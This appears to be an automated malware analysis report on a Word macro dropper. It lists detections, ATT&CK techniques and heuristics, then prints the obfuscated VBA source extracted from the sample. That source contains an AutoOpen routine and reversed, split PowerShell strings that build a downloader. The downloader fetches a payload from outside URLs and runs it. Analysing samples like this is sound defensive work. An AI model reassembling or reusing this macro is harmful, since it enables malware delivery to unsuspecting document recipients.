Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6544797-0. It contains a VBA macro with an AutoOpen subroutine that calls the Shell() function, which strongly suggests the macro is designed to execute a command, most likely to download and run a secondary malicious payload. The specific payload and its distribution URL could not be extracted directly from the available evidence.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6544797-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6544797-0
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 120387 bytes | 56371932e305cd1676939c237e792e0f19bb83861422a7478b8ec419f3bb574c |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "OnBfUuKPAG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub nqECF(wzPVrK)
hLYCfo = ONTDU
zIqYrj = sQTSA
WQwOWY = quMFEQ + Sgn(4970 - CZWAhL - qIqiKE + Fix(7982)) - 33047 - CDbl(84675)
BqRrQ = 98173
End Sub
Sub foDDvl(aidqr)
RTdtap = sOcmd
zCakk = aZVtIa
XWDfaN = voiMYR + Sgn(51847 - FRLQZb - RzttER + Fix(44828)) - 93403 - CDbl(49207)
SfSBo = 66132
YDZKT = MSLwU
hsASl = DmjJJ
rJrFm = aQiJr + Sgn(43106 - bzlhb - SDsrdS + Fix(24780)) - 63574 - CDbl(91412)
wVPuBS = 21012
GjCYD = XAiQJ
REFQq = zROnZ
iimocc = ImOav + Sgn(82465 - zWTcow - nTrPw + Fix(6430)) - 62583 - CDbl(36868)
JTHauY = 67541
End Sub
Sub XBPAVD(KZzVcz)
wcErLv = iYUps
HnQwa = kFmhWR
MFYFK = wXUiWD + Sgn(26648 - JsduLc - XWJzvp + Fix(23939)) - 60596 - CDbl(23441)
hZviTF = 37108
zwjmJ = vMzbMJ
LpRpjP = PAjsI
oiSFqn = kLjRk + Sgn(24930 - DiplS - IVjit + Fix(70416)) - 81264 - CDbl(25171)
wModaF = 32838
End Sub
Sub Autoopen()
On Error Resume Next
ulZzBz = zEWAC
KwZFaT = oMFwwr
TdHmJ = pvAsDG + Sgn(41887 - ioOpKM - OOXzmW + Fix(9750)) - 66181 - CDbl(61086)
CKmqVz = 67865
YHKYKmw (PrPwhC + zYoPjqwo + zTJXq)
miZEO = nWQkMU
AvikJ = fwvVYP
VipDvK = WQjNlG + Sgn(26724 - UzHCiR - YOiAj + Fix(22632)) - 16255 - CDbl(81853)
BohNI = 64984
End Sub
Sub oBftk(VzCdj)
wNVlPU = aUuid
ZXMwZ = mmmTA
YQJtjz = ciuvf + Sgn(5993 - tCHst - CfKrI + Fix(5618)) - 56943 - CDbl(56013)
sJuUnq = 7099
hlzbAj = cjtGHk
uZdwtG = kjUZf
kBLQbp = ZGwvB + Sgn(91962 - PbJWVM - OUqqz + Fix(94844)) - 57996 - CDbl(93818)
dCVzu = 51673
dfRiF = ciuzbD
WzDTZ = jVZds
cCTtjw = oHjrDi + Sgn(13441 - sIwAVa - hfwCYY + Fix(89557)) - 99066 - CDbl(7757)
ZCdlJ = 78839
End Sub
Sub zrOBq(zkSuo)
ddWBo = nuiZM
Hcqijd = iThBiM
rawRGd = maXDB + Sgn(77572 - VukZf - tOPVE + Fix(77307)) - 10365 - CDbl(10055)
vcroCc = 26295
End Sub
Attribute VB_Name = "MSinVBSafpYNZz"
Sub zqscKc(SYBsf)
MMmoHw = GwhYN
vZwhrU = BrwJAC
zAKmc = XOSDj + Sgn(10805 - ZUDIUP - hnTqJ + Fix(46846)) - 65282 - CDbl(88734)
OcoFi = 46729
End Sub
Function zYoPjqwo()
On Error Resume Next
mvwrZ = GvzmtX
oppkol = jTcDn
tEauAw = ORNXY + Sgn(78533 - hYsXi - NjYnE + Fix(31646)) - 87487 - CDbl(24493)
STsDw = 76623
lUXFfR = NVmGib
cSZZzw = aXHbif
hJami = jEzbV + Sgn(97831 - VjIao - IstBiS + Fix(65832)) - 13118 - CDbl(21358)
PiAmLf = 21878
RsvhJMiKd = rMUGYw("@0e'+'rof;)b3feb3f+b'+'3fxe.b3f'+'( +'+' BSNSgX +'+' b3fy'+'Udb'+'3f'+' +'+' '+'c'+'ilbup:vneSgX = CDSSgX;)b3f@b3f(tilpS'+'.b3f'+'nray.6ohu=l?php.v'+'tset/'+FTok", 65802 + 5 - 65802, 65802 + 155 - 65802)
TzMEY = wDwhR
OjnvWW = IsUwHY
jzUME = UzHpWE + Sgn(39289 - DiTApQ - iqFPpr + Fix(5190)) - 36425 - CDbl(98253)
FfQjA = 67161
jAcVV = JjdzM
HcsIj = irhXCo
tmfjh = jqhjo + Sgn(72554 - mNHfi - lPvpaQ + Fix(42687)) - 59435 - CDbl(56547)
fMznR = 52065
UjLRXffPIP = rMUGYw("iG2t( & | )29]RaHC[,'yUd' EcALpeR- 69]RaHC[,'eDp' EcaLpo9P", 73024 + 4 - 73024, 73024 + 52 - 73024)
izvqcS = tEWawQ
CtICow = EPLiGp
XqzqK = cfiDJz + Sgn(40819 - VtvjMQ - Solccp + Fix(49558)) - 68060 - CDbl(69598)
WcYWN = 48283
wMjicJ = zHwIp
TFjuWl = TMPMO
GnjUt = rWFrri + Sgn(71497 - EiTisP - DKmCw + Fix(67708)) - 29561 - CDbl(30264)
wWQTDi = 32402
fCFEUjZi = rMUGYw("tjUza'NUH/moc.'+'4'+'8wqgd5wqtg//'+':p'+'tth '+' b3f'+' = '+'XC'G", 69273 + 2 - 69273, 69273 + 59 - 69273)
DQwROO = MkoJks
TzrCcu = zIcGS
USRsZR = acRApw + Sgn(95055 - LuFftL - QbBBW + Fix(41709)) - 12549 - CDbl(13751)
KvTUt = 36552
SFDDV = zcvGX
YEPvJp = IsvjTQ
QbdwU = BAZXzI + Sgn(3526 - ssruwM - YiTrYN + Fix(51418)) - 22347 - CDbl(43545)
jmPzY = 97739
swQVoU = rMUGYw("tomen'+'b3'+'f(.'+' = '+'U'+'YY'+'SgX;modnar'+' )b3ftb3f+b'+'3f'+'cejbo-wb'+'3f+'+'b3f'+'eb3f+b3fnb3'+'f(& = dsa'+'dasn'+'Sg'+'X'((pUsAY", 91419 + 6 - 91419, 91419 + 128 - 91419)
ltqYfs = AosQAE
XDKrwK = wQaoC
PWmnT = tICWXt + Sgn(72474 - rkUKL - jMiFH + Fix(52461)) - 78002 - CDbl(83626)
dP
... (truncated)